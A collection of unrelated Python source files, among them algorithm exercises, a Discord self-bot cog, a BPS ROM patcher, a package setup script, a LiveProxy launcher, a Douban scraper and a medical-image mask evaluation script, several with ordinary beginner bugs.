index = bisect.bisect(self.moon_phases, (phase, ''))
return self.moon_phases[index][1]
@commands.command()
async def today(self, ctx):
''' Gets some information about today '''
now = datetime.now()
moon_phase = self.get_moon_phase(now)
zodiac_sign = self.get_zodiac(now.month, now.day)
desc = (f'Moon Phase: {moon_phase}\n'
f'Zodiac sign: {zodiac_sign}\n')
embed = discord.Embed(type='rich', description=desc)
embed.set_author(name=f'Today is {now:%A, %B %d, %Y}')
await ctx.send(embed=embed)
@commands.command()
async def uptime(self, ctx):
''' Gets the uptime of this self-bot '''
uptime = str(self.bot.uptime).split('.')[0]
await ctx.message.edit(content=f'`{uptime}`')
@commands.command()
async def unixtime(self, ctx):
''' Gets the current UNIX timestamp '''
await ctx.message.edit(content=f'`{time.time()}`')
|
import json
def openfile(l):#import data
a=open(l, 'r')
b=json.loads(open(l).read())[0]
x=b["universe_name"]
y=b['rewards']
z=b['portals']
return x,y,z
class Universe(object):
def __init__(self,name=str(),rewards=(),portals=()):
self.name=name
self.rewards=rewards
self.portals=portals
def __str__(self):
return self.name
def countrewards(self):
return len(self.rewards)
def countportals(self):
return len(self.portals)
if __name__ == "__main__":#Test
x,y,z=openfile('file1.txt')
print(Universe(x,y,z),Universe(x,y,z).countrewards(),Universe(x,y,z).countportals())
|
t = int(input())
while t > 0:
n = int(input())
s = str(input())
if s[0] == '2' and s[-1] == '0' and s[-2] == '2' and s[-3] == '0':
print("YES")
elif s[0] == '2' and s[1] == '0' and s[2] == '2' and s[-1] == '0':
print("YES")
elif s[0] == '2' and s[1] == '0' and s[2] == '2' and s[3] == '0':
print("YES")
elif s[-1] == '0' and s[-2] == '2' and s[-3] == '0' and s[-4] == '2':
print("YES")
elif s[0] == '2' and s[1] == '0' and s[-1] == '0' and s[-2] == '2':
print("YES")
else:
print("NO")
t = t-1
|
values = {1:1, 2:5, 3:8, 4:9, 5:10, 6:17, 7:17, 8:20, 9:24, 10:30}
previous_values = []
def rod_cut(rod_length):
current_max = 0
previous_values.append(0)
for length in range(1, rod_length + 1):
for possible_cut in values:
if possible_cut <= length:
current_max = max(current_max, values[possible_cut] +
previous_values[length - possible_cut])
print(previous_values)
previous_values.append(current_max)
print(current_max)
print(previous_values)
rod_cut(4)
|
#
# @lc app=leetcode.cn id=34 lang=python3
#
# [34] 在排序数组中查找元素的第一个和最后一个位置
#
# @lc code=start
class Solution:
def searchRange(self, nums: List[int], target: int) -> List[int]:
left, right = self.binarySearchLeft(nums, target), self.binarySearchRight(nums, target)
return [left, right] if left <= right else [-1, -1]
def binarySearchLeft(self, nums, target):
left, right = 0, len(nums) - 1
while left <= right:
med = (left + right) // 2
if nums[med] >= target:
right = med - 1
else:
left = med + 1
return left
def binarySearchRight(self, nums, target):
left, right = 0, len(nums) - 1
while left <= right:
med = (left + right) // 2
if nums[med] <= target:
left = med + 1
else:
right = med - 1
return right
# @lc code=end
|
import ha_engine.ha_infra as common
import habase_helper as helper
LOG = common.ha_logging(__name__)
class BaseMonitor(object):
def __init__(self, input_args):
self.ha_report = []
self.input_args = {}
if input_args:
self.set_input_arguments(input_args)
def set_input_arguments(self, input_args):
self.input_args = input_args
LOG.info("Self, input %s " , str(self.input_args))
def get_input_arguments(self):
return self.input_args
def start(self, sync=None, finish_execution=None):
raise NotImplementedError('Subclass should implement this method')
def stop(self):
raise NotImplementedError('Subclass should implement this method')
def report(self):
raise NotImplementedError('Subclass should implement this method')
def stable(self):
raise NotImplementedError('Subclass should implement this method')
def is_module_exeution_completed(self, finish_exection):
raise NotImplementedError('Subclass should implement this method')
|
"""
insertion sort implementaion
"""
def insertion_sort(x):
if len(x) < 2:
return
for i in range(1, len(x)):
for j in range(i, 0, -1):
if x[j] < x[j - 1]:
x[j], x[j - 1] = x[j - 1], x[j]
|
from .aws import AutoScaling
from .formatter import FormatReport
from .sender import SendReport
def stateless_ha(asg):
return 'StatelessHa' in asg['Tags']
def not_enough_subnets(asg):
return len(asg['VPCZoneIdentifier'].split(',')) < 2
def enough_subnets(asg):
return len(asg['VPCZoneIdentifier'].split(',')) >= 2
def asg_name(asg):
return asg['AutoScalingGroupName']
def asg_subnet_report(sender, region):
autoscaling_groups = list(
filter(stateless_ha, AutoScaling(region).describe_auto_scaling_groups())
)
report = {
'Sufficient Subnets': map(
asg_name, filter(not_enough_subnets, autoscaling_groups)
),
'Insufficient Subnets': map(
asg_name, filter(enough_subnets, autoscaling_groups)
),
}
SendReport(FormatReport(report).format()).send(sender, region=region)
|
import binascii
import enum
import io
ENDIAN = "little"
class Action(enum.IntEnum):
SourceRead = 0
TargetRead = 1
SourceCopy = 2
TargetCopy = 3
def convert_uint(b: bytes):
return int.from_bytes(b, ENDIAN, signed=False)
def read_number_io(b: io.BytesIO) -> int:
data, shift = 0, 1
# this was basically directly copied from the bps_spec
while(True):
x = b.read(1)
if len(x) == 0:
return None
x = convert_uint(x)
data += (x & 0x7f) * shift
if (x & 0x80):
break
shift <<= 7
data += shift
return data
def read_number(b: bytes) -> tuple:
""" Read a number that starts at the beginning of the bytes
returns a tuple of the number read and remaining bytes
"""
bio = io.BytesIO(b)
data = read_number_io(bio)
return data, bio.read()
class InvalidPatch(Exception):
def __init__(self, msg):
self.msg = msg
class BPSPatch(object):
MAGIC_HEADER = "BPS1".encode("UTF-8")
def __init__(self, patch: bytes):
header = patch[:4]
if header != self.MAGIC_HEADER:
raise InvalidPatch(f"Magic header {header} is incorrect")
self.source_checksum = convert_uint(patch[-4*3:-4*2])
self.target_checksum = convert_uint(patch[-4*2:-4*1])
self.patch_checksum = convert_uint(patch[-4*1:])
calculated_checksum = binascii.crc32(patch[:-4])
if self.patch_checksum != calculated_checksum:
raise InvalidPatch(
f"Patch Checksum {self.patch_checksum} does not match "
f"actual checksum {calculated_checksum}"
)
remainder = patch[4:]
self.source_size, remainder = read_number(remainder)
self.target_size, remainder = read_number(remainder)
self.metadata_size, remainder = read_number(remainder)
self.metadata = remainder[:self.metadata_size].decode("UTF-8")
# actions is everything else other than the header and footer
self.actions = remainder[self.metadata_size:-12]
def patch_rom(self, source: bytes) -> bytes:
if len(source) != self.source_size:
raise InvalidPatch(
f"source size {len(source)} does not match "
f"expected {self.source_size}")
source_checksum = binascii.crc32(source)
if source_checksum != self.source_checksum:
raise InvalidPatch(
f"source checksum {source_checksum} does not match "
f"expected {self.source_checksum}")
target = bytearray(self.target_size)
actions = io.BytesIO(self.actions)
output_offset = 0
source_relative_offset = 0
target_relative_offset = 0
while(True):
action = read_number_io(actions)
if action is None:
break
command = action & 3
length = (action >> 2) + 1
print(f"Command {command}, length {length}")
if command == Action.SourceRead:
# consume some number of bytes from source file
target[output_offset:output_offset + length] = \
source[output_offset:output_offset + length]
output_offset += length
elif command == Action.TargetRead:
# consume some number of bytes from patch file
target[output_offset:output_offset + length] = \
actions.read(length)
output_offset += length
elif command == Action.SourceCopy:
# consume some number of bytes from source file, but from
# somewhere else. This action seems unnecessarily complicated
data = read_number_io(actions)
source_relative_offset += (-1 if data & 1 else 1) * (data >> 1)
target[output_offset:output_offset + length] = \
source[
source_relative_offset:source_relative_offset + length]
output_offset += length
source_relative_offset += length
elif command == Action.TargetCopy:
# consume some number of bytes from the target file
data = read_number_io(actions)
target_relative_offset += (-1 if data & 1 else 1) * (data >> 1)
# unfortunately it is not safe to optimize this, as one of the
# documented use cases is to write a single byte then duplicate
# that byte over and over filling out an array.
for _ in range(length):
target[output_offset] = target[target_relative_offset]
output_offset += 1
target_relative_offset += 1
target_checksum = binascii.crc32(target)
if target_checksum != self.target_checksum:
raise InvalidPatch(
f"target checksum {target_checksum} does not match "
f"expected {self.target_checksum}")
return target
def main():
with open("/home/mgius/base_patch.bps", "rb") as f:
base_patch = f.read()
with open("/home/mgius/src/retropie-alttpr/ZeldaBase.sfc", "rb") as f:
source = f.read()
patcher = BPSPatch(base_patch)
base_patched = patcher.patch_rom(source)
with open("/home/mgius/src/retropie-alttpr/ZeldaPatched.sfc", "wb") as f:
f.write(base_patched)
if __name__ == '__main__':
main()
|
import random
import math
Menu = True
gameStart = False
instructionStart = False
aboutStart = False
global selection
""" This is the "about" page; essentially a credits page """
def About():
leaveAbout = False
while leaveAbout == False:
print('u uglee')
leaveAbout = input('type anything to leave lmao :')
if leaveAbout == 'yes':
leaveAbout = True
""" This function asks for the player's class."""
def charClass(selection):
character = "nothing"
while selection == "nothing":
if selection == 'knight':
print('The knight has great defense and average attack. They lack critical chance and dodge, but are very versatile because they can switch swords during battle.')
confirmation1 = input('Would you like to select this class?')
if confirmation1 == "yes":
Zone = 1
character = 'knight'
break
else:
selection = "nothing"
elif selection == 'assassin':
print('The assassin has high potential for dps and has a great amount of dodge, but requires a lot of luck and mana management. Their special abilites are poisons.')
confirmation2 = input('Would you like to select this class?')
if confirmation2 == "yes":
Zone = 1
character = 'assassin'
break
else:
selection = "nothing"
elif selection == 'brawler':
print('The brawler specializes in martial arts, they are the jack-of-all-trades and are cost efficent since they can fight without weapons.')
confirmation1 = input('Would you like to select this class?')
if confirmation1 == "yes":
Zone = 1
character = "brawler"
break
else:
selection = "nothing"
elif selection == 'mage':
print('The mage has good burst damage and utility but lack defensive capabilities and requires mana management. Their special abilites are a set of high damage abilities.')
confirmation1 = input('Would you like to select this class?')
if confirmation1 == "yes":
Zone = 1
character = 'mage'
break
else:
selection = "nothing"
elif selection == 'necromancer':
print('The necromancer has low dps an burst but have great defensive capabilites. They rely on minions for main damage and ues health as a resource.')
confirmation1 = input('Would you like to select this class?')
if confirmation1 == "yes":
Zone = 1
character = "necromancer"
break
else:
selection = "nothing"
else:
print('That is not an avaliable class')
selection = "nothing"
def Game():
zone = 0
health = 0
mana = 0
dodge = 0
armor = 0
crit = 0
gold = 500
selection = 'nothing'
selection = input('Select your character's role [Knight, Assassin, Brawler, Mage, Necromancer]: ')
while selection == 'nothing':
charClass(selection)
print(selection)
while Menu == True:
print('This is the endless Labyrinth')
print('Type \"start\" to start the game')
print('Type \"instructions\" if this is your first time playing')
print('Type in \"about\" to learn about the development of the game')
interfaceInput = input(":")
if interfaceInput == 'start':
gameStart = True
Menu = False
elif interfaceInput == 'instructions':
instructionStart = True
elif interfaceInput == 'about':
aboutStart = True
else:
print('Not a valid response.')
continue
if gameStart == True:
Game()
elif instructionStart == True:
Instructions()
elif aboutStart == True:
About()
|
import setuptools
from setuptools import setup, find_packages
from setuptools.command.install import install
import os
from os.path import isfile, isdir, join, dirname
class CustomInstallCommand(install):
"""Customized setuptools install command."""
def run(self):
from setuptools.command.install import install
install.run(self)
# since nltk may have just been installed
# we need to update our PYTHONPATH
import site
try:
reload(site)
except NameError:
pass
# Now we can import nltk
import nltk
path_to_nltk_f = nltk.__file__
nltkpath = dirname(path_to_nltk_f)
punktpath = join(nltkpath, 'tokenizers')
wordnetpath = join(nltkpath, 'corpora')
if not isfile(join(punktpath, 'punkt.zip')) \
and not isdir(join(punktpath, 'punkt')):
nltk.download('punkt', download_dir=nltkpath)
if not isfile(join(wordnetpath, 'wordnet.zip')) \
and not isdir(join(wordnetpath, 'wordnet')):
nltk.download('wordnet', download_dir=nltkpath)
nltk.data.path.append(nltkpath)
setup(name='corpkit',
version='2.2.7',
description='A toolkit for working with linguistic corpora',
url='http://github.com/interrogator/corpkit',
author='Daniel McDonald',
packages=['corpkit'],
scripts=['corpkit/new_project'],
package_dir={'corpkit': 'corpkit'},
package_data={'corpkit': ['*.jar', 'corpkit/*.jar', '*.sh', 'corpkit/*.sh',
'*.ipynb', 'corpkit/*.ipynb', '*.p', 'dictionaries/*.p',
'*.py', 'dictionaries/*.py']},
author_email='mcdonaldd@unimelb.edu.au',
license='MIT',
cmdclass={'install': CustomInstallCommand,},
keywords=['corpus', 'linguistics', 'nlp'],
install_requires=["matplotlib>=1.4.3",
"nltk>=3.0.0",
"joblib",
"pandas>=0.16.1",
"mpld3>=0.2",
"lxml>=3.4.4",
"requests",
"chardet",
"blessings>=1.6",
"traitlets>=4.1.0"],
dependency_links=['git+https://www.github.com/interrogator/corenlp-xml-lib#egg=corenlp-xml-lib',
'git+https://github.com/interrogator/tkintertable.git@e983dea6565d583439cbe04034774944388213ae#egg=tkintertable'])
|
# set去重
# 对每个元素n 判断数组中是否有n + k 或 n - k
class Solution:
def findPairs(self, nums: List[int], k: int) -> int:
visited, res = set(), set()
for num in nums:
if num - k in visited:
res.add(num - k)
if num + k in visited:
res.add(num)
visited.add(num)
return len(res)
|
import json
import os
import secrets
from functools import lru_cache
BASE_DIR = os.path.dirname(os.path.abspath(__file__))
DATA_DIR = os.path.join(BASE_DIR, 'data')
TEMPLATES = os.listdir(os.path.join(BASE_DIR, 'html'))
@lru_cache(maxsize=10)
def autodiscover():
"""
Autodiscover files in the HTML folder of the application
"""
def wrapper(filename=None):
if filename is not None:
if filename in TEMPLATES:
_file = TEMPLATES[TEMPLATES.index(filename)]
return os.path.join(BASE_DIR, 'html', _file)
raise FileNotFoundError(
f'The file you are looking for does not exist. {", ".join(TEMPLATES)}')
return wrapper
def get_data_file(name):
data_path = os.path.join(BASE_DIR, 'data')
return os.path.join(data_path, name)
def write_new_file(values, update_for, filename=secrets.token_hex(5)):
"""
Quickly write values to a file
Parameters
values (list): list of values to write
update_for (str): the name of the file from which the data was updated
filename (str, optional): file name. Defaults to secrets.hex_token(5).
Returns
bool: True or False
"""
file_name = f'{filename}_updated_from_{update_for}.json'
file_path = os.path.join(DATA_DIR, file_name)
with open(file_path, 'w') as f:
json.dump(values, f, indent=4)
return True
|
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
from pylib.timer import *
from pylib.utils import *
|
class Student:
def __init__(self, name): #constructor
self.name = name
self.subscores = []
def average(self):
return sum(self.subscores)/len(self.subscores)
stu_1 = Student("Lehan")
stu_1.subscores.extend([45,55,79])
print(f"{stu_1.average():.2f}")
|
import os
import pymongo
from tqdm import tqdm
from collections import OrderedDict
from src.tokenizer import Tokenizer
from src.indexer import read_directory
from src.parser import parse
import config
import pprint
import json
Index = dict()
Header = dict()
pp = pprint.PrettyPrinter()
def build_index():
global Index, Header
tokenizer = Tokenizer()
for subdir in os.listdir(config.RAW_WEBPAGES):
full_subdir = os.path.join(config.RAW_WEBPAGES, subdir)
if os.path.isdir(full_subdir):
to_parse = read_directory(full_subdir)
print("Subdirectory: ", subdir)
for _file in tqdm(to_parse):
filename = "/".join(_file.split("/")[1:])
header, txt = parse(_file)
Header[filename] = header
token_counter = tokenizer.counter_tokenize(txt)
for tok in token_counter:
if tok not in Index:
Index[tok] = { filename : token_counter[tok]}
else:
Index[tok][filename] = token_counter[tok]
save_index()
save_header()
def save_header():
with open(config.HEADER_PATH, 'w') as f:
json.dump(Header, f, sort_keys=True, indent=4)
print("[Saved Header succesfully on {}]".format(config.HEADER_PATH))
def save_index():
with open(config.INDEX_PATH, 'w') as f:
json.dump(Index, f, sort_keys=True, indent=4)
print("[Saved Index succesfully on {}]".format(config.INDEX_PATH))
def main():
# client = pymongo.MongoClient('mongodb://localhost:27017/')
# client.drop_database("ICSdatabase")
# db = client['ICSdatabase']
build_index()
# pp.pprint(Index)
if __name__ == '__main__':
main()
|
from typing import Any
from tqdm.auto import tqdm
from parseridge.parser.training.callbacks.base_callback import Callback
class ProgressBarCallback(Callback):
"""
Shows a progress bar during training.
"""
def __init__(self, moving_average: int = 64):
self._pbar = None
self.template = "[{epoch:02d}/{epochs:02d}] | Batch Loss: {loss:8.4f}"
self.prev_loss = []
self.moving_average = moving_average
self.batch_size = None
self.num_epochs = None
self.current_epoch = None
def on_train_begin(self, epochs: int, batch_size: int, **kwargs: Any) -> None:
self.batch_size = batch_size
self.num_epochs = epochs
def on_epoch_begin(
self, epoch: int, num_batches: int, training_data: Any, **kwargs: Any
) -> None:
self.current_epoch = epoch
self._pbar = tqdm(total=len(training_data), leave=True)
self._pbar.set_description(
self.template.format(epoch=self.current_epoch, epochs=self.num_epochs, loss=0)
)
def on_epoch_end(self, epoch_loss: float, **kwargs: Any) -> None:
self._pbar.set_description(
"[{epoch:02d}/{epochs:02d}] | Epoch Loss: {loss:8.4f}".format(
epoch=self.current_epoch, epochs=self.num_epochs, loss=epoch_loss
)
)
self._pbar.close()
def on_batch_end(self, batch_loss: float, batch_data: Any, **kwargs: Any) -> None:
if batch_loss is not None:
self.prev_loss.append(batch_loss)
avg_loss = sum(self.prev_loss) / len(self.prev_loss)
self.prev_loss = self.prev_loss[-self.moving_average :]
else:
if self.prev_loss:
avg_loss = sum(self.prev_loss) / len(self.prev_loss)
else:
avg_loss = 0
self._pbar.set_description(
self.template.format(
epoch=self.current_epoch, epochs=self.num_epochs, loss=avg_loss
)
)
batch_length = len(batch_data[0])
self._pbar.update(batch_length)
|
class Queue(object):
def __init__(self):
self.queue = []
def isEmpty(self):
return self.queue == []
def enqueue(self, data):
return self.queue.insert(0, data)
def dequeue(self, data):
return self.queue.append(data)
def size(slef):
return len(self.queue)
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
import base64
import codecs
import errno
import logging
import os
import platform
import sys
from liveproxy import __version__ as liveproxy_version
from requests import __version__ as requests_version
from streamlink import __version__ as streamlink_version
from .argparser import parser
from .constants import FILE_OUTPUT_LIST
from .shared import (
check_root,
setup_logging,
)
from .server import (
HTTPRequest,
ThreadedHTTPServer,
)
log = logging.getLogger('streamlink.liveproxy-main')
def log_current_versions():
'''Show current installed versions'''
# MAC OS X
if sys.platform == 'darwin':
os_version = 'macOS {0}'.format(platform.mac_ver()[0])
# Windows
elif sys.platform.startswith('win'):
os_version = '{0} {1}'.format(platform.system(), platform.release())
# linux / other
else:
os_version = platform.platform()
log.info('For LiveProxy support visit https://github.com/back-to/liveproxy')
log.debug('OS: {0}'.format(os_version))
log.debug('Python: {0}'.format(platform.python_version()))
log.debug('LiveProxy: {0}'.format(liveproxy_version))
log.debug('Streamlink: {0}'.format(streamlink_version))
log.debug('Requests: {0}'.format(requests_version))
def main():
error_code = 0
args = parser.parse_args(sys.argv[1:])
setup_logging()
check_root()
log_current_versions()
HOST = args.host
PORT = int(args.port)
if args.help:
parser.print_help()
elif args.file:
if not os.path.isfile(args.file):
log.error('File does not exist: {0}'.format(args.file))
return
elif not os.access(args.file, os.F_OK):
log.error('Can\'t read file: {0}'.format(args.file))
return
if args.format == 'm3u':
URL_TEMPLATE = 'http://{host}:{port}/base64/{base64}/'
# %3a
elif args.format == 'e2':
URL_TEMPLATE = 'http%3a//{host}%3a{port}/base64/{base64}/'
else:
return
new_lines = []
log.info('open old file: {0}'.format(args.file))
with codecs.open(args.file, 'r', 'utf-8') as temp:
text = temp.read()
for line in text.splitlines():
if line.startswith('streamlink'):
line = URL_TEMPLATE.format(
host=HOST,
port=PORT,
base64=base64.b64encode(line.encode('utf-8')).decode('utf-8'),
)
new_lines.append(line)
if args.file_output:
new_file = args.file_output
else:
new_file = args.file + '.new'
if args.file == new_file:
log.warning('Don\'t use the same name for the old and the new file.')
return
if not new_file.endswith(tuple(FILE_OUTPUT_LIST)):
log.error('Invalid file type: {0}'.format(new_file))
return
log.info('open new file: {0}'.format(new_file))
with codecs.open(new_file, 'w', 'utf-8') as new_temp:
for line in new_lines:
new_temp.write(line + '\n')
log.info('Done.')
else:
log.info('Starting server: {0} on port {1}'.format(HOST, PORT))
try:
httpd = ThreadedHTTPServer((HOST, PORT), HTTPRequest)
except OSError as err:
if err.errno == errno.EADDRINUSE:
log.error('Could not listen on port {0}! Exiting...'.format(PORT))
sys.exit(errno.EADDRINUSE)
log.error('Error {0}! Exiting...'.format(err.errno))
sys.exit(err.errno)
try:
httpd.serve_forever()
except KeyboardInterrupt:
# close server
if httpd:
httpd.shutdown()
httpd.server_close()
log.error('Interrupted! Exiting...')
error_code = 130
finally:
if httpd:
try:
log.info('Closing server {0} on port {1} ...'.format(HOST, PORT))
httpd.shutdown()
httpd.server_close()
except KeyboardInterrupt:
error_code = 130
sys.exit(error_code)
|
#Enter 2 numbers, to show result with and without decimal places.
a = int(raw_input())
b = int(raw_input())
print (a/b)
print float (a)/b
#Examples of operators.
#Source https://www.programiz.com/python-programming/operators
x = 15
y = 4
# Output: x + y = 19
print('x + y =',x+y)
# Output: x - y = 11
print('x - y =',x-y)
# Output: x * y = 60
print('x * y =',x*y)
# Output: x / y = 3.75
print ('x / y =', float(x)/y)
# Output: x // y = 3
print ('x // y =',x//y)
# Output: x ** y = 50625. 15 to power of 4
print('x ** y =',x**y)
|
import numpy as np
import scipy.io
from numpy import genfromtxt
import os
import cv2
from sklearn import metrics
########################################### Vertebra segmentation results
IMG_SIZE_X = 128
IMG_SIZE_Y = 256
# function to generate datasets with segmentation maps of entire spinal column
def create_roi_datasets(roi_dir, fn_dir, IMG_SIZE_X, IMG_SIZE_Y):
# extract filenames and landmark data into arrays
fn_data = genfromtxt(fn_dir, delimiter=',', dtype=str)
roi_data = []
# extract ROIs in order of filenames - same order as landmarks
for filename in fn_data:
for roi in os.listdir(roi_dir):
if roi == filename:
roi_array = cv2.imread(os.path.join(roi_dir, roi), cv2.IMREAD_GRAYSCALE)
new_array = cv2.resize(roi_array, (IMG_SIZE_X, IMG_SIZE_Y))
roi_data.append([new_array])
# save images in array and binarize
roi_data = np.array(roi_data).reshape(-1, IMG_SIZE_Y, IMG_SIZE_X, 1)
roi_data[roi_data < 0.5] = 0
roi_data[roi_data >= 0.5] = 1
roi_data = roi_data.astype(float)
roi_data = np.squeeze(roi_data)
return roi_data
gt_roi_dir = "../data/PredictionsVsGroundTruth/SpineMasks_GroundTruthEndplates"
pred_roi_dir = "../data/PredictionsVsGroundTruth/SpineMasks"
pred_processed_roi_dir = "../data/PredictionsVsGroundTruth/SpineMasks_Processed"
fn_dir = "../data/boostnet_labeldata/labels/test/filenames.csv"
gt_masks = create_roi_datasets(gt_roi_dir, fn_dir, IMG_SIZE_X, IMG_SIZE_Y)
pred_masks = create_roi_datasets(pred_roi_dir, fn_dir, IMG_SIZE_X, IMG_SIZE_Y)
pred_proc_masks = create_roi_datasets(pred_processed_roi_dir, fn_dir, IMG_SIZE_X, IMG_SIZE_Y)
pred_mask_acc = metrics.accuracy_score(gt_masks.reshape(-1), pred_masks.reshape(-1))
pred_proc_masks_acc = metrics.accuracy_score(gt_masks.reshape(-1), pred_proc_masks.reshape(-1))
pred_mask_bal_acc = metrics.balanced_accuracy_score(gt_masks.reshape(-1), pred_masks.reshape(-1))
pred_proc_masks_bal_acc = metrics.balanced_accuracy_score(gt_masks.reshape(-1), pred_proc_masks.reshape(-1))
pred_mask_dice = 1 - scipy.spatial.distance.dice(gt_masks.reshape(-1), pred_masks.reshape(-1))
pred_proc_masks_dice = 1 - scipy.spatial.distance.dice(gt_masks.reshape(-1), pred_proc_masks.reshape(-1))
|
#-*- coding: UTF-8 -*-
# import scrapy
#
#
# class QuotesSpider(scrapy.Spider):
# name = "bookLink_test"
#
# def start_requests(self):
# urls = [
# 'https://book.douban.com/tag/?view=type&icn=index-sorttags-hot#%E6%96%87%E5%AD%A6',
# ]
# for url in urls:
# yield scrapy.Request(url=url, callback=self.parse)
#
# def parse(self, response):
# filename = 'tagLink.html'
# with open(filename, 'wb') as f:
# f.write(response.body)
# self.log('Saved file %s' % filename)
# import scrapy
# import sys
#
#
#
# class doubanSpider(scrapy.Spider):
# name = 'tagLink'
# start_urls = ['https://book.douban.com/tag/?view=type&icn=index-sorttags-hot#%E6%96%87%E5%AD%A6']
#
# def parse(self, response):
# reload(sys)
# sys.setdefaultencoding('utf-8')
# lista = response.css('table.tagCol a::attr(href)')
# print('list' + str(lista))
# with open('link.txt', 'w') as f:
# for href in response.css('table.tagCol a::attr(href)').extract():
# f.write('https://book.douban.com' + str(href) + '\n')
# # f.write(response.css('table.tagCol a::attr(href)'))
# import scrapy
# import sys
#
#
# class doubanSpider(scrapy.Spider):
# name = 'tagLink'
# start_urls = ['https://book.douban.com/tag/?view=type&icn=index-sorttags-hot#%E6%96%87%E5%AD%A6']
#
# def parse(self, response):
# reload(sys)
# sys.setdefaultencoding('utf-8')
# for href in response.css('table.tagCol a::attr(href)').extract():
# book_list = response.urljoin(href)
# yield scrapy.Request(book_list, self.parse)
# print(type(href))
#
# def parse_bookList(self,response):
# reload(sys)
# sys.setdefaultencoding('utf-8')
# with open('bookname.txt', 'w') as f:
# for info in response.css('div.info'):
# yield {
# 'bookname': info.css('a::title')
# }
# f.write(info.css('a::title')+'\n')
# import scrapy
# import sys
#
#
# class doubanSpider(scrapy.Spider):
# name = 'tagLink'
# start_urls = [
# 'https://book.douban.com/tag/%E5%B0%8F%E8%AF%B4'
# ]
# def parse(self, response):
# reload(sys)
# sys.setdefaultencoding('utf-8')
# with open('bookname.txt', 'w') as f:
# for info in response.css('div.info'):
# for i in info.css('h2 a::text').extract():
# f.write(str(i).strip().replace('\n', '')+'\n')
# import scrapy
# import sys
# from myscrapy.items import MyscrapyItem,bookLink,book
# class doubanSpider(scrapy.Spider):
# name = 'tagLink'
# start_urls = [
# 'https://book.douban.com/tag/%E5%B0%8F%E8%AF%B4'
# ]
# def parse(self, response):
# reload(sys)
# sys.setdefaultencoding('utf-8')
# bookListItem = bookLink()
# book_list = response.css('ul.subject-list')
# with open('bookLink.txt', 'w') as f:
# for item in book_list.css('li.subject-item'):
# book_name = item.css('h2 a::text').extract().strip()
# book_link = item.css().extract('h2 a::attr(href)').extract().strip()
# bookListItem['book_name'] = book_name
# bookListItem['book_link'] = book_link
# book_list = response.urljoin(book_link)
# yield scrapy.Request(book_list, self.book_parse)
# f.write(bookListItem.book_name + '\t' + bookListItem.book_link)
# next_page = response.css('span.next a::attr(href)').extract().strip()
# if next_page is not None:
# next_page = response.urljoin(next_page)
# yield scrapy.Request(next_page, callback=self.parse)
# def book_parse(self, response):
# reload(sys)
# sys.setdefaultencoding('utf-8')
# bookItem = book()
# bookItem['book_name'] = response.css('h1 span::text').extract().strip()
# bookItem['ave_rate'] = response.css('').extract().strip()
# bookItem['comment_num'] = response.css('').extract().strip()
# bookItem['rate5'] = response.css('').extract().strip()
# bookItem['rate4'] = response.css('').extract().strip()
# bookItem['rate3'] = response.css('').extract().strip()
# bookItem['rate2'] = response.css('').extract().strip()
# bookItem['rate1'] = response.css('').extract().strip()
# bookItem['author'] = response.css('').extract().strip()
# bookItem['original_name'] = response.css('').extract().strip()
# bookItem['translator'] = response.css('').extract().strip()
# bookItem['public_year'] = response.css('').extract().strip()
# bookItem['rate5'] = response.css('').extract().strip()
# bookItem['rate5'] = response.css('').extract().strip()
# bookItem['rate5'] = response.css('').extract().strip()
# bookItem['rate5'] = response.css('').extract().strip()
# bookItem['rate5'] = response.css('').extract().strip()
import scrapy
import sys
from myscrapy.items import MyscrapyItem,bookLink,book
class doubanSpider(scrapy.Spider):
name = 'tagLink'
# start_urls = [
# 'https://book.douban.com/tag/%E5%B0%8F%E8%AF%B4'
# ]
start_urls = [
'https://book.douban.com/tag/?view=type&icn=index-sorttags-hot'
]
def parse(self, response):
reload(sys)
sys.setdefaultencoding('utf-8')
for href in response.css('table.tagCol a::attr(href)').extract():
tag_list = response.urljoin(href)
yield scrapy.Request(tag_list, self.book_list_parse)
# print(type(href))
def book_list_parse(self, response):
reload(sys)
sys.setdefaultencoding('utf-8')
bookListItem = bookLink()
book_list = response.css('ul.subject-list')
with open('bookLink.txt', 'w') as f:
for item in book_list.css('li.subject-item'):
book_name = item.css('h2 a::text').extract().strip()
book_link = item.css().extract('h2 a::attr(href)').extract().strip()
book_list = response.urljoin(book_link)
yield scrapy.Request(book_list, self.book_parse)
f.write(bookListItem.book_name + '\t' + bookListItem.book_link)
next_page = response.css('span.next a::attr(href)').extract().strip()
if next_page is not None:
next_page = response.urljoin(next_page)
yield scrapy.Request(next_page, callback=self.parse)
def book_parse(self, response):
reload(sys)
sys.setdefaultencoding('utf-8')
bookItem = book()
bookItem['book_name'] = response.css('h1 span::text').extract().strip()
bookItem['ave_rate'] = response.css('').extract().strip()
bookItem['comment_num'] = response.css('').extract().strip()
bookItem['rate5'] = response.css('').extract().strip()
bookItem['rate4'] = response.css('').extract().strip()
bookItem['rate3'] = response.css('').extract().strip()
bookItem['rate2'] = response.css('').extract().strip()
bookItem['rate1'] = response.css('').extract().strip()
bookItem['author'] = response.css('').extract().strip()
bookItem['original_name'] = response.css('').extract().strip()
bookItem['translator'] = response.css('').extract().strip()
bookItem['public_year'] = response.css('').extract().strip()
bookItem['rate5'] = response.css('').extract().strip()
bookItem['rate5'] = response.css('').extract().strip()
bookItem['rate5'] = response.css('').extract().strip()
bookItem['rate5'] = response.css('').extract().strip()
bookItem['rate5'] = response.css('').extract().strip()
|
#!/usr/bin/env python
#
# Copyright 2007 Google Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
import webapp2
import jinja2
import os
env = jinja2.Environment(
loader=jinja2.FileSystemLoader(os.path.dirname("templates"))
)
class MainHandler(webapp2.RequestHandler):
def get(self):
main_template = env.get_template("templates/index.html")
self.response.write(main_template.render())
class ProjetoHandler(webapp2.RequestHandler):
def get(self):
main_template = env.get_template("templates/projeto.html")
self.response.write(main_template.render())
class AdoteHandler(webapp2.RequestHandler):
def get(self):
main_template = env.get_template("templates/faleconosco.html")
self.response.write(main_template.render())
class FaleConoscoHandler(webapp2.RequestHandler):
def get(self):
main_template = env.get_template("templates/faleconosco.html")
self.response.write(main_template.render())
app = webapp2.WSGIApplication([
('/', AdoteHandler),
('/adote', AdoteHandler),
('/faleconosco', FaleConoscoHandler),
